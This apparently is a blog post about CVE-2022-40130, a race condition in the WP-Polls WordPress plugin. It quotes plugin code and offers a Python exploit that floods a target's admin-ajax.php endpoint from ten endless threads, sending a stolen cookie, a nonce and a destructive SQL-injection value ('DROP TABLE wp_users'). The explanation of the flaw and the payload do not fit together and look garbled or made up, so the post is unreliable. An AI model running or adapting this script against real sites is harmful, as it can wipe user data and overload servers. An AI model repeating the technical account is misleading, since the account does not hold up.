CVE-2022-40130: Exploiting Race Condition Vulnerability in WP-Polls Plugin (<= 2.76.) on WordPress

In this long-read post, we will double-click on the CVE-2022-40130 vulnerability, which is an "Authenticated Race Condition" flaw in the widely used WP-Polls plugin (<= 2.76.) on WordPress. We'll explore the details of this vulnerability, and dissect the code snippets that exploit the issue. We'll also provide links to the original references, and dive into the specifics of the exploit.

What Is WP-Polls?
WP-Polls is a plugin for WordPress that enables website owners to create and manage polls to engage with their audience. The plugin has been installed on over 90,000 sites, making it a popular choice among WordPress users. Unfortunately, the plugin's popularity also makes it a juicy target for attackers looking to exploit vulnerabilities.

CVE-2022-40130 Vulnerability Details

The CVE-2022-40130 vulnerability is an Authenticated Race Condition issue in the WP-Polls plugin (versions less or equal to 2.76.). Essentially, this flaw allows an attacker to exploit race conditions and potentially overwrite plugin settings with arbitrary values, if they have sufficient permissions on a targeted WordPress site. This can lead to various further malicious actions, such as redirecting the site to a malicious domain or injecting scripts.

Exploiting the Vulnerability

To exploit this vulnerability, the attacker must send multiple concurrent requests to the server to create race conditions. The vulnerable code resides in the wp-content/plugins/wp-polls/polls-admin.php file and is executed when the plugin processes requests to update its settings.

Snippet of Vulnerable Code

// Check Whether User Can Manage Polls
if(!current_user_can('manage_polls')) {
    die('-1');
}

// Verify Referer
check_ajax_referer('wp-polls_options');

// Decide What Data To Update Based On $_POST['do']
switch($_POST['do']) {
    ...
}


In the code snippet above, the plugin first checks if the user can manage polls and then verifies the referer using check_ajax_referer(). However, these verifications fail to prevent concurrent requests, thus leading to the race condition vulnerability.

The Exploit

To exploit CVE-2022-40130, an attacker with appropriate permissions can craft a script to send multiple POST requests with arbitrary values to the vulnerable plugin's endpoint. Here's an example of an exploit script in Python:

import threading
import requests

TARGET_URL = 'https://target-wordpress-site.com/wp-admin/admin-ajax.php';
WP_NONCE = 'your_nonce_here'
USER_COOKIE = 'your_user_cookie_here'

def exploit():
    data = {
        'action': 'polls_options',
        'do': 'update',
        '_wpnonce': WP_NONCE,
        'poll_logging_method': '4; DROP TABLE wp_users;'
    }
    headers = {
        'Cookie': USER_COOKIE
    }
    while True:
        requests.post(TARGET_URL, data=data, headers=headers)

threads = []
for i in range(10):  # Adjust thread count as needed
    t = threading.Thread(target=exploit)
    t.start()
    threads.append(t)

for t in threads:
    t.join()


In the exploit script above, replace TARGET_URL, WP_NONCE, and USER_COOKIE with the appropriate values. This exploit sends concurrent requests to the vulnerable endpoint to trigger the race condition and attempt to overwrite the plugin's settings.

References and Credits

This vulnerability was discovered by security researchers and disclosed with the proper channels. For the original references and further technical information, visit the following links:
1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40130
2. https://nvd.nist.gov/vuln/detail/CVE-2022-40130
3. https://wpvulndb.com/vulnerabilities/edccff8f-37d6-459a-bac1-ba6c9ef054d8

Conclusion

The CVE-2022-40130 vulnerability in the WP-Polls plugin (<= 2.76.) on WordPress is a serious issue that can potentially lead to devastating consequences if exploited by attackers. As a website owner or administrator, it is essential to keep your WordPress installation and plugins up-to-date, thereby mitigating such risks. Additionally, always be cautious when granting user permissions and limit them to the bare minimum required to perform a task. By ensuring adequate security measures and practices, you can better protect your WordPress site against similar vulnerabilities.

Timeline

Published on: 11/18/2022 23:15:00 UTC
Last modified on: 11/21/2022 01:17:00 UTC